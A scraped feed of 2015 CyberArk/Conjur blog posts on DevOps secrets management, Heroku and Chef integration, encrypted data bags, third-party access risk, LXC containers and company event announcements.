It almost goes without saying that secrets must be encrypted from end-to-end. For example:

  • The secrets should be encrypted when “at rest” in the secrets server
  • Each secret should be encrypted with a unique key, which is itself encrypted by a master key (or set of master keys)
  • Cryptography should be profesionally audited, and ideally open-sourced.
  • Secrets should be encrypted in transit, using e.g. TLS
  • SSL verification must be ON! Never SSL_VERIFY_NONE, not even in development systems.

RBAC for people, machines, and code

The access to the secrets in the server needs to be governed by a robust policy model.  This model must support all the identities that are common in the world of DevOps – people, servers, VMs, containers, and web services. DevOps, by nature, is dynamic. Machines, containers, and services are constantly being created and destroyed. This is commonly referred to as treating servers like cattle. Once the policies have been defined and agreed upon, both the DevOps and Security teams can be confident that the workflows are following security best practices like least privilege, defense in depth, and separation of duties.

In globally distributed, dynamic systems where machines are automatically provisoned and destroyed by code, simple authentication mechanisms like OAuth or API Keys work better than traditional IT server management approaches such as client certificates and Kerberos. And along with the identity of each instance comes a role, which gives each machine privileges within an authorization policy. This type of automated “host factory” eliminates the need for manual intervention by information security staff in the DevOps workflow.

The model must also support RBAC for human users.  For example, DevOps teams are often loaded with contractors; in many regulated environments contractor access to systems needs to be restricted. This type of model is required to support security best practices as separation of duties and least privilege.

Self-Auditing

The complete lifecycle of the objects managed by the DevOps Secrets Server must be audited.  All access to secrets, whether successful or not, must be audited as well.  Without proper auditing and other robust controls like strong encryption and the aforementioned RBAC, the server is just serving up name value pairs.  It’s good for a shared data layer but it’s not a secrets server.

Fully programmable with fine granularity

Since many of the actors in the workflow are silicon-based (machines), and not carbon-based (people), the DevOps secret server needs to have a comprehensive set of APIs.  The APIs must be protected by the same RBAC model and all API calls must be audited as well.  GUIs are important for reporting, alerting, and visualizing the policy model but not as a primary means of interacting with the system.  Self service and other business as usual activities can be easily built on the APIs.

Highly available across any cloud, hybrid, and global architecture

Security systems are mission critical and need to be highly available and support zero downtime upgrades.  This requires an architecture that is purpose built for the types of infrastructures that DevOps applications leverage or plan to leverage in the future.  They need to work with any cloud (public/hybrid) and across clouds. The scaling, fault-tolerance, and failure recovery features should use cloud-native primitives like autoscaling and containerized cluster deployment.

This is essential because the DevOps secrets server is going to be run by the same DevOps team as the rest of the infrastructure. The more integrated the secrets server is with the rest of the environment,the more seamless the experience. Increased integration also means that security can flow with, not against, the tide.

About Conjur

Conjur is a company dedicated to addressing the security challenges of DevOps.  Secrets management is one such use case that the Conjur platform addresses.  The DevOps world is complicated and constantly changing, therefore, various solutions are emerging.  Conjur is already deployed by DevOps leaders like Netflix, Rally Software, and Novartis.  Conjur is ready today.  Are you?

A note on cryptography in Conjur

All secrets managed by Conjur are encrypted and decrypted by the open-source library slosilo. Slosilo has been professionally reviewed by a 3rd party auditor. The crypto audit report is avaliable on request.

]]> Secure Developer Access to Hosted Services via Conjur and Pow https://www.cyberark.com/blog/secure-developer-access-to-hosted-services-via-conjur-and-pow/ Mon, 27 Apr 2015 16:12:00 +0000 https://cyberarkvx2.wpengine.com/blog/secure-developer-access-to-hosted-services-via-conjur-and-pow/  

Conjur’s HTTP service authorization capability, aka Software Defined Firewall (SDF), is a high performance and highly available way to protect services and micro-services against unauthorized access. The SDF consists of two parts: the forwarder, and the gatekeeper. The forwarder runs on the client end of the transaction. All outbound traffic from the client is sent through the forwarder, which:

  • Authenticates the client with Conjur, obtaining a Conjur auth token

  • Puts the auth token on the outbound request, in the HTTP Authorization header

The gatekeeper runs on the server side. It’s a lightweight reverse proxy which intercepts each inbound request, verifies authenticity of the auth token, and verifies the client’s access privilege using the Conjur web service.

The gatekeeper is installed on the server-side in accordance with the server-side hosting architecture. For example, for Heroku apps, the gatekeeper is installed as a custom buildpack. In Docker clusters, the gatekeeper is a Docker container which is outward-facing, and has a Docker “link” to the protected service.

In server-to-server scenarios, the forwarder can also run embedded in the server stack (e.g. Docker cluster). A key aspect of all Conjur technology is our emphasis on consistent workflows through development/stage/production, and uniform access controls for people, machines and code. Therefore, it’s important for developers to have an easy way to run a local forwarder and thereby access SDF-protected services.

After brainstorming and experimenting with some different approaches, we’ve discovered pow.cx, “a zero-config Rack server for Mac OS X”. It’s a self-contained web server that automatically launches Rack-based applications, and assigns them locally resolvable DNS names like “myapp.dev”.

Let’s take a look at the entire workflow: setting up Pow, using it to run a Conjur forwarder, and invoking a protected web service using cURL.

The Conjur ReleaseBot is a good example of a protected web service. It’s a Sinatra app which runs in Heroku and performs Conjur code pushes to RubyGems, NPM, and Heroku. It has a simple REST interface:

  • POST /npm/releases release to NPM
  • POST /rubygems/releases release to RubyGems
  • DELETE /rubygems/releases/:name yank a Ruby gem
  • POST /heroku/releases push a Heroku app

To access this protected web service from a developer machine (on MacOS), the first step is to install Pow:

$ curl get.pow.cx | sh
Next, create a Rack application which runs a forwarder. Conjur provides a forwarder implementation called conjur-asset-proxy which runs as a plugin to the Conjur CLI.
A simple Gemfile installs the dependency libraries:
source "https://rubygems.org"

gem 'conjur-cli'
gem 'conjur-asset-proxy'
A config.ru (aka “rackup”) defines the Rack application, which builds a Conjur proxy to the remote service:
proxy = Conjur::Proxy.new("https://releasebot-conjur.herokuapp.com", api)
proxy.configure
run proxy
(This is just a snippet, you can view a full example here).
Rack applications are mounted into Pow via symlinks. Pow picks these up automatically and deploys them as Rack applications. Navigate to the ~/.pow directory and create a symlink to the Rack application:
$ cd ~/.pow
$ ln -s ~/source/sdf-forwarders/releasebot .
Pow logs are easy to find and read in the MacOS Console:
pow-console-log
When everything’s up and all looks well in the log, accessing the service is a simple matter of a cURL command (or for web apps, opening the http://appname.dev in your browser).

So, how is ReleaseBot used to publish a new Ruby gem version of the Conjur CLI? First, here’s what it looks like without any authorization:

$ curl -i -X POST https://releasebot-conjur.herokuapp.com/rubygems/releases 
  --data "name=conjur-cl"

HTTP/1.1 401 Unauthorized
Server: Cowboy
Date: Fri, 24 Apr 2015 19:56:03 GMT
Connection: keep-alive
Content-Type: text/html;charset=utf-8
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 0
Via: 1.1 vegur

By changing the base URL to http://releasebot.dev, which is running automatically under Pow, we can successfully perform the Gem release without having to worry about authorization:

$ curl -X POST releasebot.dev/rubygems/releases --data "name=conjur-cli"
Gem version 4.21.1 released
This is just as convenient as using completely insecure services! That’s the workflow everyone is looking for, without the risk. This is security at speed, via Conjur.

 

]]>
Securing Heroku Apps https://www.cyberark.com/blog/securing-heroku-apps/ Thu, 23 Apr 2015 20:51:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-heroku-apps/ Heroku is great. We use it internally at Conjur to host smaller apps, like our Demo Factory. This app allows you to get a Conjur demo by filling out a form. This little app has a lot of power – it needs credentials to access many different services. This is where it gets complicated – how do we give the app access to these credentials in a safe and dev-friendly way?

In this post I will go into detail about how the Demo Factory works and what systems it needs access to, the Heroku-recommended approach to give access and its problems, and finally a friendlier approach using Conjur.

Demo Factory – how it works and what it needs

This is what happens when you request a Conjur demo:

  1. an EC2 instance spins up
  2. it is provisioned with Chef
  3. in ~10 minutes you receive an email with instructions on how to access your demo environment.

These are the credentials the app needs to be able to access to do its job:

  • AWS keys to create and destroy instances
  • Sentry DSN to capture any exceptions that may occur
  • Hipchat API token to post messages to a room when demos launch
  • Hubspot API token to create contacts
  • Mandrill API key to send emails
  • Keen API key to capture metrics for later aggregation

The Heroku Way

In accordance with the Twelve-Factor App manifesto, Heroku apps receive their configuration via environment variables, “config vars” in Heroku parlance. You set your config vars via the Heroku CLI or UI and access them as environment variables in your application.

When developing an app that requires secrets, you create a .env file and run the app via foreman. You can also use the heroku-config plugin to pull variables from Heroku into your .env file. You add the .env file to the project’s .gitignore file. This is where the workflow starts to unravel.

If any part of your secrets workflow depends on gitignoring files, this should be a red flag.

Why? You now have secrets sitting in plain text on your dev system. If you forget to gitignore that file or your machine is compromised, your secrets are public. We are working so hard in the DevOps community to achieve parity between environments – this lets us catch problems earlier when they’re less expensive. So why should our secrets workflow be different for development, test/CI and production? The way our applications and engineers access secrets should be the same no matter what environment they are in.

Rotating your secrets is a good idea. This should not affect your developer workflows. By gitignoring parts of your application, you’re putting the obligation of keeping secrets up to date on your developers. This is a distraction from what they do to deliver value – shipping features.

Finally, there is no trail of access to secrets in this workflow. Lack of transparency is the number one obstacle to compliance. If you have compliance obligations, the Heroku Way of handling secrets rules out using Heroku. It’s also worth noting that handing the keys to your kingdom to a third party with minimal transparency on how they’re used is not ideal.

The Conjur Way

The Conjur workflow is based on assigning permissions to identities. Users, hosts, third-party platforms; they all have an identity. Our goal here is transparency: which identities have access to which secrets and how are they using them.

This starts with a policy, a security topology that can be checked into source control. Conjur has a Ruby DSL for doing this. Here is the policy file for the demo factory:

 

In the policy we define the names for our variables (secrets) and give the layer “service” execute (get the value) privilege on those variables. Note that there is nothing sensitive in this policy file, we can check it into Github and make it public.

We load this policy into Conjur with the Conjur CLI like so:

conjur policy load --collection production policy.rb

This operation is idempotent.

You can now add values to the variables you defined in your policy file through the Conjur CLl like so:

conjur variable values add mandrill/api-key 98phe12p89hda

Now we need to create an identity for our Heroku app. We’ll create a host identity and add it to the policy’s “service” layer so it can read the variables we’ve defined in our policy.

conjur host create production/heroku/demo-factory-conjur
conjur layer hosts add production/demo-factory-1-0/service production/heroku/demo-factory-conjur

A neat feature of Conjur is that you can apply host identity via environment variables. We’ll use this capability to assign an identity to our Heroku app. We can use the heroku CLI to set the config vars.

 

Now our Heroku application can use its Conjur identity to fetch secrets at runtime. The API key is a single secret that can be managed by ops without interfering with development, instead of multiple secrets that are being used in code and .gitignored out of source control, troublesome to rotate or change.

The last part of the puzzle is creating a mapping of environment variables to secret names and updating our Procfile to use conjurenv. conjurenv is a subcommand in the Conjur CLI that allows you to use a mapping file to expose secrets as environment variables to any process.

Here is the mapping file for demo-factory:

 

Now we can run our app prefixed with conjurenv and it will be able to access secrets via environment variables. Demo Factory is a Sinatra app, so we update our Procfile like so:

web: bundle exec conjur env run -- bundle exec rackup config.ru

How is this better?

For starters, we don’t have secrets on our systems. Once the command wrapped by conjurenv exits, the environment variables are gone. Dust in the wind.

By definition, the policy is minimally scoped to the application. It is the least privilege that still gets the job done, the smallest possible turtle.

Our Heroku app has a granular level of access to the secrets it needs through Conjur. Execute permission means it can only view the value of the variable. It does not have “update” or “read” permissions to change the value or view the access control relationships, respectively.

Our security policy is now checked into source control where our teammates can read and review it. Making a pull request on a permissions change? This is a bright new world.

Secret rotation is no longer disruptive. When someone updates the value of a Conjur variable the dev workflow is not affected. The next time the app pulls down a secret via conjurenv it will be the updated value.

Secrets are accessed in a consistent way across environments. Developers, your CI system and the Heroku app all use conjurenv when they need a secret.

We have a full audit log of secrets access for our app. You can view audit events in the Conjur CLI or UI.


Closing Thoughts

The Conjur Way is not Heroku-specific. You can apply a Conjur identity to other services outside your direct control as well. Other PaaS solutions like Stackato or dotCloud, CI platforms like TravisCI or CircleCI, et al. As long as you can configure your application through environment variables you can use the pattern outlined in this post. The way you manage and distribute secrets should be the same, no matter your platform.

Our demo-factory is open-source, feel free to browse it on Github.

 

]]>
Conjur and Chef: Baking in Security https://www.cyberark.com/blog/conjur-and-chef-baking-in-security/ Mon, 20 Apr 2015 23:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-and-chef-baking-in-security/  

We have just released our official cookbook to the Chef Supermarket!

https://supermarket.chef.io/cookbooks/conjur

To see this cookbook in action, check out our brand-new SSH demo.

We wrote this cookbook to make it simple for you to apply a Conjur identity to nodes you are already managing with Chef. One benefit here is that accessing secrets in your Chef runs becomes much simpler if they are run on a host with a Conjur identity. Instead of managing encrypted data bags and their decryption keys, you can pass in secrets as environment variables and use ENV['mysecret'] in your recipes.

Example

Another benefit is that you aren’t using Chef to do SSH access management. Instead, you are organizing your security layout in a role-based manner: users into groups and hosts into layers. This means that when you need to add a new user or host, escalate privileges temporarily or remove users or hosts from your topology you don’t need to worry about modifying data bags and pushing them through your release process. Permissions changes happen instantly via Conjur’s replicated web services.

Finally, you have an audit trail. Any access to secrets, SSH logins/logouts and sudo calls – they are all logged and accessible via the Conjur CLI, UI or API.


I want to highlight the usage pattern we suggest for setting up your hosts with Conjur and Chef. This same pattern can be applied for other CM tools you may be using. There are three steps in this workflow.

1. Foundation

Include the conjur::conjurrc recipe in the base cookbook for your organization. This recipe configures the connection to the Conjur server endpoint and establishes SSL verification. Set attributes for your Conjur endpoint. None of these attributes are secret – you can check them into source control.

If you want Conjur to manage SSH access, include the conjur::install in your base cookbook as well. This recipe installs and configures packages required for Conjur SSH.

If you want to install the Conjur CLI on your hosts, include the conjur::client recipe. You’ll then be able to use the conjur env command for easy injection of secret as environment variables into your scripts and applications.

This base configuration can be baked into an image for faster launches.

2. Identity

Once you have your base image, you need to apply a Conjur identity to your host. How you do this will depend on your infrastructure. We use AWS internally so I’ll briefly walk through we apply identity to our Jenkins executors.

We created a layer named ‘build-0.1.0/jenkins’. This layer has permissions to read different secrets needed by our CI jobs. Using host-factory, we created a token for hosts to enroll into this layer. This token is passed as a parameter to the CloudFormation stack that defines an auto-scaling group of EC2 instances. The user-data for the instances is a bash script that then uses this token to create and apply a host identity on instance launch. Instances launch, execute their user-data script and can then interact with Conjur.

Example

A Conjur identity can also be supplied entirely through environment variables. We’ll cover this in an upcoming post on applying identity to Heroku applications.

3. Configure

This step is only necessary if you want to manage SSH through Conjur. Include the conjur::configure recipe in your application cookbooks or roles. This recipe applies the Conjur host identity to finish the machine configuration.


In summary, applying Conjur identity to a host means applying base configuration, giving the host an identity and then running any post-identification steps necessary for your organization’s setup.

As always, pull requests welcome!

 

]]>
Top 5 Things To Do at RSA 2015 [Conjur Edition] https://www.cyberark.com/blog/top-5-things-to-do-at-rsa-2015-conjur-edition/ Mon, 20 Apr 2015 17:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/top-5-things-to-do-at-rsa-2015-conjur-edition/  

Conjur is happy to announce that we will be exhibiting at RSA Conference for the first time this year!  You may be asking yourself, why RSA? As the conference website states, “Throughout its history, RSA Conference has consistently attracted the world’s best and brightest in the field, creating opportunities for conference attendees to learn about IT security’s most important issues through first-hand interactions with peers, luminaries and emerging and established companies.”  We think our method of Security for DevOps fits perfectly within this mold which is why we are so excited to meet and help RSA attendees all week.

RSA-Conference-2015

With over 20,000 attendees, 400 vendors, 300 sessions, and 500 speakers it can be difficult to know how best to spend your time during your week in San Francisco.  Here are 5 can’t miss things do at RSA 2015:

1) Attend this session: Is DevOps Breaking Your Company?

Conjur’s CEO, Elizabeth Lawler, will be discussing the relationship between DevOps and Security and share some tips on how to ensure that improved Security doesn’t disrupt your always evolving DevOps flow.  You can attend this 50 minute presentation on Wednesday, April 22nd at 9:10am PST in Mascone West, Room 3004.

2) Visit our booth: Moscone South #2738

We will have members from our Executive Team, Marketing, UX, and Sales at our booth during the conference.  Not only will you have the opportunity to learn more about how Conjur delivers Security for DevOps, but you can also register to win our raffle prize…an Apple Watch!

3) Take the Conjur DevOps Security Quiz

Think you know Security?  How about DevOps?  You can test your knowledge with our 5 question quiz either at the booth (which will register you for our raffle) or by taking it here.  Share your results with your team, assuming you aced it, or learn how, based on your answers, we can help you solve this problem.

4) Register for a Demo

When it comes to our primary use cases, Secrets Management and Access Control (SSH), don’t just take our word that our solutions work, try them out for yourself.  Either visit our booth or sign up for a demo here:

Upon signing up you will receive access to your own demo environment for 24 hours and will be able to replicate the use case during an interactive, self-paced tutorial.

5) Free Security Assessment

If you are looking for a deeper dive into our solution, or would like to discuss how Conjur could fit into your unqiue infrastructure environment, you need to sign up for our free Security Assessment.  During this 30 minute conversation we will take the time to learn more about your architecture and provide you with ideas and best practices on how to stay secure and compliant without sacrificing speed and performance.

The last thing you can do is tweet us @ConjurInc if you have questions during or after the conference.  We are very excited to be at RSA this year and hope to meet you soon!

 

]]>
Conjur REST API Documented! https://www.cyberark.com/blog/conjur-rest-api-documented/ Fri, 10 Apr 2015 19:34:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-rest-api-documented/  

One of the great features of Conjur is that you can talk to it via a RESTful API. Unfortunately this API hasn’t been documented. Well no more!

Head to developer.conjur.net/api to see our new API documentation.

Now you have the power of the Conjur CLI without needing the CLI installed. This means you can use Conjur from your embedded devices, Windows platforms and esoteric Linux distros.

The docs are a work in progress but we have documented the routes most requested by you and will be adding more soon.

 

 

]]>
3 Questions for DevOpsGuys.com https://www.cyberark.com/blog/3-questions-for-devopsguys-com/ Thu, 09 Apr 2015 19:08:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-questions-for-devopsguys-com/  

As part of our guest blogging series we recently had the pleasure of speaking with James Smith and Steve Thair from DevOpsGuys.com.  James (the Dev Guy) and Steve (the Ops Guy) have a super-active blog that features fantastic DevOps related content. We sat down with them and asked 3 DevOps realted questions which have been transcribed below.  Enjoy!

1) Tell us a little about DevOpsGuys.com and how you got started in the industry and the blog?

In 2013 Steve and I realised that joining the Forces of developers and operators was the solution to the emerging problems in contemporary software development

DevOpsGuys is a response to a gap in the market. Cloud computing technology is developing at breakneck speed and through streamlined, integrated efficiency, DevOpsGuys ensure every stage of a business’ online development is run by a single team of experts working closely, sharing skills, and keeping up with the latest industry developments.  For us, DevOps is a philosophy rather than a process. Coming respectively from a development and an operations background it became obvious that both of our roles essentially focused around achieving the same end goal, so rather than passing tasks and problems back and forth between us, it seemed far more productive to work together to make sure the job in its entirety was complete.

A consolidated approach to application delivery and managed operations is vital for businesses to optimise online applications stay ahead of digital advances, and, more importantly, their competitors.

We exist to make life simpler and to optimise every system, application and process. Not every business can do this internally, so our job is to simplify the web management side of a business while you focus on adding value to your business.

devopsguys-icon-hr-rgb

One of the key principals of DevOps is sharing. We’re open and transparent about everything that we do and we really want to see the digital marketplace thriving. The Blog is essentially our way of sharing our knowledge, thoughts, and experiences with the world. It’s a co-operative affair; we love sharing other people’s work and ideas, too, and we often feature guest blogs and review relevant articles where we can.

We currently offer three services: a DevOps Maturity Assessment, a Managed Operations service and an Application Delivery service. We’ve just set up HQ in Cardiff and have received support from the Welsh Government to develop the IT sector in this part of the UK

 2) What is the biggest myth about DevOps that you routinely see communicated today?

Probably that DevOps is a system or a process that once you’ve ‘done it’ your business will be transformed and you can carry on again as normal.  DevOps is a cultural shift as well as a technological one, so for someone it could be a lengthy transition; eliminating internal silos, changing the way departments share data and information as well as implementing new software, systems and processes. But for everyone it’s an ongoing strategy that you adopt and use and update all the time.

3) For a company who does not currently have a DevOps culture, what is the single most important thing they should do within their organization before embarking on the journey?

Establishing goals.  If you don’t know where you want to be you can’t get there, but you also need to know where you’re starting: taking a DevOps maturity assessment is the only way to understand where you are now, how much work you have to do and what that work is. From there you can begin to plan your journey from A to B and meet your goals. The best advice we’ve seen is Jesse Robbins’ presentation on culture. Check it out.

Thanks again for the time James and Steve! We look forward to more great DevOps content from you guys.

 

]]>
Securing Third-Party Access, A Weak Link in Enterprise IT https://www.cyberark.com/blog/securing-third-party-access-a-weak-link-in-enterprise-it/ Wed, 08 Apr 2015 09:00:23 +0000 https://www.cyberark.com/blog//

CyberArk-3rdPartyAccess-InfographicMany external users require access to your network in the course of normal operations. It’s an inevitable part of doing business today. This access facilitates business productivity, allowing external and internal users to collaborate efficiently on projects, address maintenance issues quickly, and provide seamless services to your environment.

Yet recent high-profile attacks reveal that malicious hackers are increasingly targeting third-party vendors and supply chain partners as they often have less sophisticated security policies and controls than the actual target companies, and provide an open backdoor for attackers. Recent research shows that 63 percent of data breaches are caused by security vulnerabilities introduced by third parties. And it’s not hard to see why – today’s leading institutions have between 200 and 300 high-risk, third-party relationships at a time.

Attackers target these less secure partners to compromise remote access points, steal and exploit privileged credentials, and gain access to targeted networks. From here, attackers can elevate privileges, move laterally through the network, and execute their attack goals while completely circumventing the targeted company’s defenses.

Understanding common remote vendor access types and associated vulnerabilities is the first step in mitigating this risk. To that end, we’ve published a new security brief to provide organizations with guidance on how to address remote vendor access as a privileged access point that requires tight security controls. Topics covered include: approaches for managing and securing third-party credentials, how to isolate and monitor external sessions, and the importance of threat detection capabilities in security solutions for third-party access.

You can download this free security brief here: www.cyberark.com/remote-vendor.

With the proper privileged account security controls in place, organizations can provide the network access required for business efficiency while maintaining consistent security across all types of accounts – internal and external.

]]>
Today’s Advanced Persistent Threats and WarGames? https://www.cyberark.com/blog/todays-advanced-persistent-threats-and-wargames/ Thu, 02 Apr 2015 20:36:07 +0000 https://www.cyberark.com/blog//

One of the most well-known hacker movies is WarGames. Given the movie was from the 80s, there are a lot of cringe-inducing scenes – especially when it comes to the hack itself. There’s no way a teenager could hack into the most advanced military weapons in the world, is there?

Sometimes life imitates art, which is why the recent news that the Pentagon’s Chief Weapon’s Tester showed “significant vulnerabilities” to cyber attacks was so disconcerting. This comes more than 30 years after the movie was made…

The tests were conducted across more than 40 of the most advanced military weapon systems, and all of them were found to have profound weaknesses that could be exploited in a cyber attack.

According to the report, “one of the most nagging problems that cyber security faces, no matter how many times they update procedure, are ‘compliance’ problems: human error, unpreparedness and exploits as meager as bad passwords. And once a hacker gets access to a single weak password, it can lead to ‘rapid access and exploitation’ of an entire weapons system.”

This is especially true when the weak password is supposed to secure a privileged account.  Cyber attackers covet privileged accounts, because of the broad power and access they provide. The theft and exploitation of these accounts have led to some of the biggest data breaches in the past few years – but they’ve also been at the heart of some of the most the devastating critical infrastructure attacks in recent memory as well.

In the most well-known cyber attack of our time, the default password securing a privileged account on a Siemens PLC was exploited to inject the Stuxnet malware into the network at the Natanz nuclear facility. The destruction caused by the malware was done through an exploit that is common to this day and easily discoverable on the Internet.

Aside from the sheer physical damage that a cyber attack can cause, the vulnerability of our top weapon systems is incredibly scary when you look at how attackers are using these same vulnerabilities to completely take over a targeted company’s infrastructure, as was done in the recent Sony and Sands Hotel attacks. Make no mistake, these attacks were not just about stealing data, they represented the hostile takeover of both companies’ networks.

This is the power of privileged accounts – they provide attackers with an all-access pass to a network, enabling them to go wherever and do whatever they want without hindrance.

Last year, the U.S. Department of Homeland Security published an RFI for Phase 2 of the Continuous Diagnostics and Mitigation (CDM) program focusing on Least Privilege and Infrastructure Integrity. CyberArk addresses multiple requirements in Phase 2 of the CDM program with our Privileged Account Security Solution.  We provide more detail on this in our new whitepaper – a ‘must read’ for federal agencies.

To learn more about how to get started on securing privileged accounts and credentials, check out the CyberArk Privileged Account Security Solution.

]]>
Let’s Talk Encrypted Data Bags https://www.cyberark.com/blog/lets-talk-encrypted-data-bags/ Thu, 02 Apr 2015 00:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/lets-talk-encrypted-data-bags/  

How should I manage secrets that Chef needs to configure my systems? This is a question that many of us that use Chef struggle with. Should I use encrypted data bags? What about chef-vault, what is it and how does it improve on encrypted data bags? Does it matter whether our infrastructure is cloud, on-prem or a mix of both?

Encrypted data bags, and tooling like chef-vault built around them, can be great mechanisms for secrets storage and retrieval in certain contexts but there are disadvantages to this solution that we should be aware of. Depending on your environment the following drawbacks may or may not matter to you.

1. Encrypted data bags solve one problem and create another.

You store your secrets in data bags and use a key to encrypt them so you can check the JSON into source control. You secrets are now encrypted and available, but only to those people/machines that have the decryption key. Now you have a key management problem. How do I make sure the right people and machines get these keys securely?

2. chef-vault’s best feature is also its worst feature

chef-vault solves the key management problem with encrypted data bags by encrypting duplicate data bag items with the public keys of nodes that require access. This is great, we can use the private/public key scheme that is already on the Chef nodes.

The downside here is that we need to know the list of nodes at encryption time. Every time we want to add/remove a node or admin we have to re-encrypt the data bag (vault) with our new list. Getting this to work with autoscaling or self-healing systems requires a lot of work. If a tool is fighting you when you are adapting it to your use case, it’s probably not the right tool.

3. Least privilege gets complicated, fast

When using encrypted data bags you are limited to one decryption key per node. That means that if you have anything but a dead-simple infrastructure you are going to need a lot of encrypted data bags. Enforcing least privilege will require you to set up and maintain a different data bag for every permutation of secrets a node will need.

For example, Service A needs the PostgreSQL password and AWS keys. Service B needs the AWS keys as well but doesn’t deal with PostgreSQL – oh and it also needs your Hipchat API token. You can see how this can get out of hand really quickly. Our infrastructure is also not static – when Service A now needs the RabbitMQ creds we need to update the data bag. As services change, are born or retire we need to spend a good amount of time managing our data bags to keep up.

No one wants to do this maintenance, so practically what this means is that we end up stuffing all of our secrets into one data bag and feeling bad about ourselves.

4. Auditing is important

Keeping a easily accessible and searchable audit log of access to secrets in your system is a necessity whether your organization is legally required to be compliant or not. You can demonstrate your PCI/SOX/etc compliance more easily with this data. If a breach occurs, having a log of access will allow you to find out what happened and react more quickly. Access logs for data bags will not be enough to make sense of your system.

5. We write cookbooks

We are infrastructure engineers – we write cookbooks and put them through their paces with test-kitchen. Mocking out data bags with dummy attributes in our .kitchen.yml or gitignoring a .kitchen.local.yml or data bags containing real secrets is not ideal. Usually this just slows us down. Our CI environments should have access to secrets for integration and acceptance tests too right? Treating dev and test environments differently than prod when it comes to secrets undermines the parity that we have been working so hard to achieve.

So what?

I’ve laid out the circumstance in which I think using encrypted data bags don’t work. So what are we supposed to do? You could roll your own solution – a lot of people do this. Most aren’t very happy with maintaining it. Or you could come talk to us at Conjur – we think we’ve got a pretty compelling solution to the problem.

]]> Conjur is at ChefConf 2015! https://www.cyberark.com/blog/conjur-is-at-chefconf-2015/ Tue, 31 Mar 2015 16:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-is-at-chefconf-2015/ CAM02857

Today kicks off ChefConf 2015 and Conjur is proud to be a first time sponsor of the event.  Not only are we excited to leave our still snowy New England weather, but we are also looking forward to meeting all of the attendees that should help to make this ChefConf the biggest and most successful one yet.

If you happen to be one of the lucky one’s who find themselves in Santa Clara this week, please stop by and say hello.  There are a few ways you can find us:

Simply look for our slick Conjur polo shirts or tweet us @ConjurInc and we will be sure to answer any questions you may have.

As you can see, it will be a busy few days here at ChefConf but we are excited to get started and meet you all!

 

]]>
How LXC Works https://www.cyberark.com/blog/how-lxc-works/ Tue, 31 Mar 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-lxc-works/  

LXC containers are built from templates, which are basically shell scripts. If the shell script uses some additional software, you have to have that software installed or the template won’t work. Here are some typical dependencies of common templates:

  • Bridge utils (namely utility brctl) for managing Linux bridges;

  • Debootstrap to install the system based on Debian from an already running an OS. You will need it if you decide to use a template to create a container with Ubuntu or Debian (or any other Debian-based distro);

  • RPM package management needed to create a container running ALT Linux, OpenSuse or OpenMandriva distribution. For Fedora, Oracle Linux and CentOS additionally you need to install Yum package manager;

  • Pacman package management needed to create a container with Arch Linux.

Keep these in mind when you create a new container.

The files in an LXC container are simply the files in /var/lib/lxc/<container-name>, a directory which contains:

  • rootfs – contains files of the guest OS

  • config – configuration file for a container

  • fstab – contains mount information in fstab format

The workflow with LXC proceeds according to the following basic pattern:

  • Start a new LXC container, using a base template.

  • Install software and otherwise configure the container.

  • At checkpoints, clone the container to create “frozen” copies (not be confused with lxc-freeze). This operation does nothing more than create copies of the container filesystem in /var/lib/lxc/<new-container>/rootfs.

  • Once you have a working container, all you have to do is create a tarball of the files. The container can then be launched on a different server by transferring the tarball, unpacking it, and running it using LXC tools.

A Simple Example

Finally, create a first container:

$ sudo lxc-create -t ubuntu -n ubuntu-01

The first time it will be delayed for five minutes, as lxc-create will start ubuntu’s template, which build a new rootfs and copies it to the folder /var/lib/lxc/ubuntu-01. LXC usually uses /var/lib/lxc/ storage containers, /var/cache/lxc/ use as a place to cache (mainly used by lxc-create and templates).

Let’s start it soon (login and password are ubuntu):

$ sudo lxc-start -F -n ubuntu-01

Please note that the guest OS has its own init process, as well there is a running sshd, and in general it is not very different from if it running somewhere on EC2. Running ifconfig you will see that the container has a network interface configured for DHCP Address – This is the default, so you do not need to worry about it. Go back out of the container to your host shell, only shutting down the container, and to achieve this in two ways:

  • Shutdown command in the container: $ sudo shutdown -h now

  • Close the console window.

It happened because you run the container without using a key -d (this’s default behaviour for old versions of LXC) and with option -F (foreground). LXC does not allow detach from the container when it was launched not in the background.

Templates

Templates are just an executable file written in bash (but not necessarily), creating the container rootfs. lxc-create invokes a template and performs the rest of the work to create the container. Keep in mind that many template scripts have dependencies  on additional programs, which are mentioned in the beginning of this article. Templates can be found in /usr/share/lxc/templates templates.

 At the moment, there are templates for Alpine Linux, ALT Linux, Arch Linux, CentOS, CirrOS, Debian, Fedora, Gentoo, OpenMandriva, OpenSUSE, Oracle Linux, Plamo Linux, and Ubuntu.

Among the templates are also some unusual finds:

  • busybox Creates minimalist lightweight container, which has installed only busybox

  • sshd normally used to allow untrusted users to be in your private network

  • ubuntu-cloud downloads the OS from https://cloud-images.ubuntu.com/ image builded by Cannonical, and decompresses and modifies it to work in LXC

  • download LXC team build images primarily adapted for use in unprivileged containers (containers runned by non-root users)

Almost all of the templates have additional options that can be found on with –help option after calling lxc-create. Use — (two dashes) to separate the lxc-create options and the template options:

$ sudo lxc-create -t ubuntu -n ubuntu-02 -- --help

/usr/share/lxc/templates/lxc-ubuntu -h|--help [-a|--arch] [-b|--bindhome <user>] [-d|--debug]

  [-F | –flush-cache] [-r|–release <release>] [ -S | –auth-key <keyfile>]

  [–rootfs <rootfs>] [–packages <packages>] [-u|–user <user>] [–password <password>]

  [–mirror <url>] [–security-mirror <url>]

 

]]>
The First Fully Hosted Conjur Demo https://www.cyberark.com/blog/the-first-fully-hosted-conjur-demo/ Fri, 27 Mar 2015 14:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-first-fully-hosted-conjur-demo/  

Legendary User Experience Designer Jared Spool once said “If you are not talking to your users two or three times a week, you are not doing User Experience Design.” These words have shaped the core of my approach for the last five years. So, three months ago, when I was brand-spanking new at Conjur, the first order of business was to elbow my way into every sales call, support call, and design partner engagement that I could. That’s part of what’s great about working at Conjur. They let you do stuff like that. In fact, they encourage it.

